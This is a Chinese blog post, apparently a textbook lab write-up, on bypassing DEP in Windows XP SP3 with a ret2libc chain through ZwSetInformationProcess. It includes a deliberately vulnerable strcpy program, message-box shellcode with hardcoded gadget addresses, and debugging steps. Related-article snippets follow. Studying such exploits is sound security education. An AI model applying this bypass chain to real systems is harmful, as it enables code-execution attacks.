0day 挑战DEP,ret2libc利用ZwSetlnformationProcess详细实现

最新推荐文章于 2023-04-22 23:48:05 发布
最新推荐文章于 2023-04-22 23:48:05 发布
阅读量226 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45612751/article/details/109448395
版权

0day2 挑战DEP,ret2libc利用ZwSetlnformationProcess详细实现

本文参考于 0day安全:软件漏洞分析技术(第2版)

此方法是利用ret2libc来关闭DEP
实验环境 windows xp sp3,vc6.0,仅开启dep,OD调试器;
代码如下:

// GS_Virtual.cpp : 定义控制台应用程序的入口点。
//

#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <windows.h>
char shellcode[]=
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x70\xE2\x92\x7C"//MOV EAX,1 RETN地址
"\x95\x8B\x1D\x5D"//修正EBP
"\x61\xf7\x80\x7C"//增大ESP
"\x37\x28\xd1\x7D"//jmp esp
"\x24\xBE\x93\x7C"//关闭DEP代码的起始位置
"\xE9\x33\xFF\xFF"
"\xFF\x90\x90\x90"
;
void test()
{
	char tt[176];
	strcpy(tt,shellcode);
}
int main()
{
	HINSTANCE hInst = LoadLibrary("shell32.dll");
	char temp[200];
	test();
    return 0;
}

代码中ret2libc调用的的相关命令地址在不同环境会发生变化,需要在调试时确定。
ZwSetInformationProcess利用条件与函数参数
思想:通过跳转到 ZwSetInformationProcess 函数将DEP关闭后再转入shellcode 执行。
函数参数:

ZwSetInformationProcess(
  HANDLE                  ProcessHandle,
  PROCESS_INFORMATION_CLASS ProcessInformationClass,
  PVOID                   ProcessInformation,//将此参数后两位置为10时,即可关闭DEP
  ULONG                   ProcessInformationLength

);

但是由于参数中含有0x00,在strcpy会被截断,因此不可直接调用此函数。

于是利用Windows检查兼容性函数LdrpCheckNXCompatibility检查SafeDisc来间接调用ZwSetInformationProcess关闭DEP。如图
在这里插入图片描述

核心是0x7C93CD24行代码,检查al是否等于1,如果等于1则执行关闭DEP的流程。

思路:由于DEP开启,堆栈不能直接写入,因此我们只需要在程序中找到mov al,1这条指令,然后跳转到这条指令即可。
实现过程
首先将用OD调试exe文件,并确定test()函数中strcpy()函数的位置。

在这里插入图片描述
然后调试至retn查看栈中信息。
在这里插入图片描述
确认到达溢出点。
retn后会发现ebp变为90909090,被shellcode覆盖,而后面函数LdrpCheckNXCompatibility的代码会向ebp-4处写入数据。如图在这里插入图片描述
因此在关闭DEP前需要修复ebp,此处使用命令push esp,pop ebp,retn 4。
至此已可成功执行完关闭dep,但是却无法控制后续跳转进入shellcode。经过调试可以发现关闭DEP过程中,有压栈操作,由于esp在ebp高地址处,因此压栈时覆盖了ebp,导致返回时出现错误。在这里插入图片描述
在这里插入图片描述
对此,我们可以在关闭DEP前利用retn N命令增大esp与ebp的距离,再利用jmp esp跳回。
至此,便可一路调试到shellcode结束。
参考
0day安全:软件漏洞分析技术(第2版)

小滢滢xyy
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用Ret2Libc挑战DEP——利用ZwSetInformationProcess
Yx0051的博客
08-09 1225
终于看到著名的DEP机制了,今天可以好好的研究它了! DEP基本原理就是数据所在内存页标识为不可执行,这样就导致一个问题,就是我们之前所有的实验都建立在一个基础上:shellcode的执行是位于堆或者栈上的,我们通过覆盖上面的正常数据,将可执行的恶意数据放在上面进行程序流程劫持。后来,微软的程序员就发现了这个致命的漏洞,就创建了这个机制:从XP SP2开始,CPU一旦检测到在非可执行区域执行指令
shellcode弹出对话框
Linux方程式
11-11 3082
功能是弹出一个对话框。本段代码在VC6.0上编译通过,此shellcode能在所有windows系统上运行且屡试不爽。  char shellcode[]= "\xfc\x68\x6a\x0a\x38\x1e\x68\x63\x89\xd1\x4f\x68\x32\x74\x91\x0c" "\x8b\xf4\x8d\x7e\xf4\x33\xdb\xb7\x04\x2b\xe3\x66\x
0day 第12章--12.3.1节:Ret2Libc 实战之利用ZwSetInformationProcess
I have a dream
02-21 769
12.3.1 利用Ret2Libc挑战DEP 思想:通过跳转到 ZwSetInformationProcess 函数将DEP关闭后再转入shellcode 执行。 核心:利用LdrpCheckNXCompatibility函数检查SafeDisc来关闭DEP的流程。 核心是0x7C93CD24行代码,检查al是否等于1,如果等于1则执行关闭DEP的流程。 思路:由于DEP开启,堆栈不能直接写入,...
Ret2Libc 实战之利用 ZwSetInformationProcess
weixin_30237281的博客
03-11 396
参考 《0day安全软件漏洞分析技术第二版》第12章 攻击未开启DEP的程序 思路: 微软要考虑兼容性的问题,所以不能对所有进程强制开启 DEP(64 位下的 AlwaysOn 除外)。 DEP 保护对象是进程级的,当某个进程的加载模块中只要 有一个模块不支持 DEP,这个进程就不能贸然开启 DEP,否则可能会发生异常。 这种攻击手段不与 DEP 有着正面冲突,只是一种普通的溢出攻击。 利用 R...
9.2 Ret2Libc实战之利用ZwSetInformationProcess
qq_55202378的博客
11-05 1229
DEP ZwSetInformationProcess
Ret2Libc 实战之利用 ZwSetInformationProcess.zip
06-11
在网络安全领域,Ret2Libc是一种常见的利用技术,主要用于攻击者通过特定的手段将程序执行流导向libc库中的任意函数,从而实现攻击目的。在这个实战案例中,我们关注的是如何利用ntdll库中的ZwSetInformationProcess...
Lab2-Return-To-Libc
11-10
在网络安全领域,Return-to-libc攻击是一种常见的利用技术,主要用于绕过数据执行防止(DEP)和地址空间布局随机化(ASLR)等安全防护机制。本资料包“Lab2-Return-To-Libc”提供了相关的代码示例、实验说明以及相关...
内存保护机制及绕过方法——利用Ret2Libc绕过DEPZwSetInformationProcess函数
weixin_30911451的博客
05-11 468
1. DEP内存保护机制 1.1 DEP工作原理 分析缓冲区溢出攻击,其根源在于现代计算机对数据和代码没有明确区分这一先天缺陷,就目前来看重新去设计计算机体系结构基本上是不可能的,我们只能靠向前兼容的修补来减少溢出带来的损害,数据执行保护DEP就是用来弥补计算机对数据和代码混淆这一天然缺陷的。 DEP的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时...
0day安全》利用 Ret2Libc 挑战 DEP
weixin_50287973的博客
09-21 246
溢出攻击的根源在于现代计算机对数据和代码没有明确区分这一先天缺陷。 DEP(数据执行保护,Data Execution Prevention)就是用来弥补计算机对数据和代码混淆这一天然缺陷的。 DEP 的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入 shellcode 时,程序会尝试在数据页面上执行指令,此时 CPU 就会抛出异常,而不是去执行恶意指令。 利用 Ret2Libc 挑战 DEP 绕过 DEP的 exploit 方法: (1)通过跳转到 ZwSetInformationProc
<Oday安全 12.3.1Ret2Libc实战之利用ZwSetInformationProcess>一节补充
lixiangminghate的专栏
03-08 908
本文补充记录我在试验关闭DEP过程遇到的问题和解决方法。     首先要说一下用OllyFindAddr插件寻找目标指令时可能会遇到的问题。诚然这个插件是个好东西,能迅速列出需要的指令流的地址,但并不是所有在列的指令地址都可以使用,挑选前需要甄别。以关闭DEP保护流程中抬高esp值"Find Pop Retn+n"为例: 插件罗列了一堆备选指令地址,我挑选最后一个地址"0x7D97FE
使用 NtSetInformationProcess hook syscall
05-30
使用 NtSetInformationProcess hook syscall 文件是使用例子
Ret2Libc学习NtSetInformationProcess DEP
weixin_30292745的博客
09-15 277
DEP简要说明 链接········································· DEP设置标示在KPROCESS 结构中 XP 下 nt!_KPROCESS +0x000 Header : _DISPATCHER_HEADER +0x010 ProfileListHead : _LIST_ENTRY +0x...
Windows内存保护机制及绕过方法
sinat_31054897的博客
07-31 2612
0 目录 GS编译 SafeSEH机制 SEH覆盖保护 数据执行保护(DEP) 地址随机化(ASLR) 1 GS编译 1.1 基本原理 Windows操作系统为解决栈溢出漏洞的问题引入了一个对策——GS编译保护技术。 GS编译保护技术是通过编译时添加相关代码而实现的,开启GS 编译选项后会在函数的开头和结尾添加代码...
开启Windows进程效能(效率)模式,降低功耗大幅提升能效比
最新发布
Sun
04-22 7903
新版Windows 11提供了Efficiency Mode,在任务管理器中的小绿叶,那么如何在开发中实现呢?一起来看看吧!进程和线程关联服务质量(QoS),新增的 EcoQoS 状态对于没有显著性能和延迟要求的工作负载非常有效。开发者可调用 API 来将其进程和线程注明为 EcoQoS,其余的由 Windows 负责。适用场景:以能源效率为重点的后台服务、更新程序、同步引擎、索引服务等。本文中提供了C++和C#两种语言示例。
详解反调试技术
热门推荐
houjingyi的博客
10-14 3万+
反调试技术,恶意代码用它识别是否被调试,或者让调试器失效。恶意代码编写者意识到分析人员经常使用调试器来观察恶意代码的操作,因此他们使用反调试技术尽可能地延长恶意代码的分析时间。为了阻止调试器的分析,当恶意代码意识到自己被调试时,它们可能改变正常的执行路径或者修改自身程序让自己崩溃,从而增加调试时间和复杂度。很多种反调试技术可以达到反调试效果。这里介绍当前常用的几种反调试技术,同时也会介绍一些逃避反
反调试 zwsetinformationthread
无本之木
07-09 4131
结构: typedef enum _THREADINFOCLASS { ThreadBasicInformation, // 0 Y N ThreadTimes, // 1 Y N ThreadPriority, // 2 N Y ThreadBasePriority, // 3 N Y ThreadAffinityMask, // 4 N Y ThreadImpersonation
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值